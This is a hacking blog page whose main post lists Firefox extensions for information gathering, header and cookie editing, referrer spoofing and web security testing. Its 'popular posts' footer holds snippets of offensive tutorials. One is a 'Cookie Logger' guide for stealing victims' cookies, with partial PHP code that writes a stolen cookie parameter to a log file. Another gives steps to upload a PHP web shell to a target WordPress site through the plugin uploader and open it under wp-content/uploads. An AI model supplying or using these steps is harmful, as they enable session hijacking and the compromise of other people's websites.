Skip to main content

Turning Mozilla Firefox To Ethical Hacking Platform

By
Turning Mozilla Firefox To Ethical Hacking Platform 




Hey Friends Some toolz wich make your firefox into Hackers Browser


Information gathering
● Whois and geo-location
o ShowIP : Show the IP address of the current page in the status bar. 
It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, 
Netcraft.
This link goes to an HTTPS secured site.

o Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping)

enables the user with one-click to map and geo-locate any website they are currently
viewing.
This link goes to an HTTPS secured site.

o HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info
data. Works with all versions of Firefox.
This link goes to an HTTPS secured site.

o Active Whois : Starting Active Whois to get details about any Web site owner and its host
server.
This link goes to an HTTPS secured site.

o Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It
includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping). Very useful for information
gathering phase

● Enumeration / fingerprinting
o Header Spy : Shows HTTP headers on statusbar
This link goes to an HTTPS secured site.

o Header Monitor : This is Firefox extension for display on statusbar panel any HTTP
response header of top level document returned by a web server. Example: Server (by
default), Content-Encoding, Content-Type, X-Powered-By and others.
This link goes to an HTTPS secured site.

● Social engineering
o People Search and Public Record : This Firefox extension is a handy menu tool for
investigators, reporters, legal professionals, real estate agents, online researchers and
anyone interested in doing their own basic people searches and public record lookups as
well as background research.
This link goes to an HTTPS secured site.

● Googling and spidering
o Advanced dork : Gives quick access to Google’s Advanced Operators directly from the
context menu. This could be used to spider a site or scan for hidden files (this spider
technique is used via scroogle.org)
This link goes to an HTTPS secured site.

o SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from
https://addons.mozilla.org/en-US/firefox/addon/spiderzilla/

o View Dependencies : View Dependencies adds a tab to the "page info" window, in which it
lists all the files which were loaded to show the current page. (useful for a spidering
technique)
Security Assessment / Code auditing
This link goes to an HTTPS secured site.

● Editors
o JSView : The ’view page source’ menu item now opens files based on the behaviour you
choose in the jsview options. This allows you to open the source code of any web page in
a new tab or in an external editor.
This link goes to an HTTPS secured site.

o Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an
X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new
window) or saved to a file (in PEM or DER format - and PKCS#7 provided that the
respective patch has been applied - cf.
This link goes to an HTTPS secured site.

o Firebug : Firebug integrates with Firefox to put a wealth of development tools at your
fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript
live in any web page
This link goes to an HTTPS secured site.

o XML Developer Toolbar : Allows XML Developer’s use of standard tools all from your
browser.
This link goes to an HTTPS secured site.

● Headers manipulation
o HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response
header of top level document returned by a web server. Example: Server (by default),
Content-Encoding, Content-Type, X-Powered-By and others.
This link goes to an HTTPS secured site.

o RefControl : Control what gets sent as the HTTP Referrer on a per-site basis.
This link goes to an HTTPS secured site.

o User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the
browser
This link goes to an HTTPS secured site.

● Cookies manipulation
o Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved
cookies.
This link goes to an HTTPS secured site.

o CookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or
"profiles" of cookies that you can quickly swap between while browsing
This link goes to an HTTPS secured site.

o httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as
httpOnly on the browser side
This link goes to an HTTPS secured site.

o Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt
file
This link goes to an HTTPS secured site.

● Security auditing
o HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It
is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
Its main purpose is to help a developer do security audits on his code.
This link goes to an HTTPS secured site.

Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post
parameters can also use to tamper data while processing the file.
This link goes to an HTTPS secured site.

Live HTTP Header : Use “lovehttpheader” to view and modify HTTP/HTTPS headers and post parameters.
This link goes to an HTTPS secured site.


o Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in
the browser’s sidebar so you can write scripts to manipulate web pages and automate web
browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes
special functions specific to web tasks.
Proxy/web utilities

● FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s
proxy configuration. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy,
ProxyTex, etc
This link goes to an HTTPS secured site.

● AnonyMox: AnonyMox lets you manage and switch between multiple proxy configurations
quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes
This link goes to an HTTPS secured site.
https://addons.mozilla.org/en-US/firefox/addon/anonymox/

● POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side JavaScript (SJS) to run a
server inside your browser. Use it to distribute files from your browser. It supports Server-side JS,
GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your
site. Users have created a wiki, chat room and search engine using SJS.
Misc
This link goes to an HTTPS secured site.
https://addons.mozilla.org/en-us/firefox/addon/pow-plain-old-webserver/

● Hacks for fun

o Greasemonkey : Allows you to customize the way a webpage displays using small bits of
JavaScript
This link goes to an HTTPS secured site.

● Encryption

o Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption
and hashing functionalities right from your Firefox browser, mostly useful for developers or
for education & fun.
Malware scanner

● QArchive.org web files checker : Allowing people to check web files for any malware (viruses, trojans, worms, adware, spyware and other unwanted things) inclusions.

● Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download,
any page you are about to visit.
This link goes to an HTTPS secured site.

● ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with
ClamWin.

● refspoof : Easy to pretend to origin from a site by overriding the URL referrer (in a http request). —
It incorporates this feature by using the pseudo-protocol spoof:// .. 
Thus it’s possible to store the information in a "hyperlink" - that can be used in any context... like html pages or bookmarks
Besides, we keep watching new extensions and we are on the way to develop a new extension for Nmap and Nessus.
This link goes to an HTTPS secured site.
https://addons.mozilla.org/en-US/firefox/addon/refspoof/


o SkipScreen -- Great Multi-Host download helper!
Skips unnecessary pages on sites like Rapidshare, 4Shared, zShare, Mediafire, and more. Try it out, or watch a demo at http://www.skipscreen.com
Why click through ad-laden pages and wait for countdowns when your computer can do it for you

Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more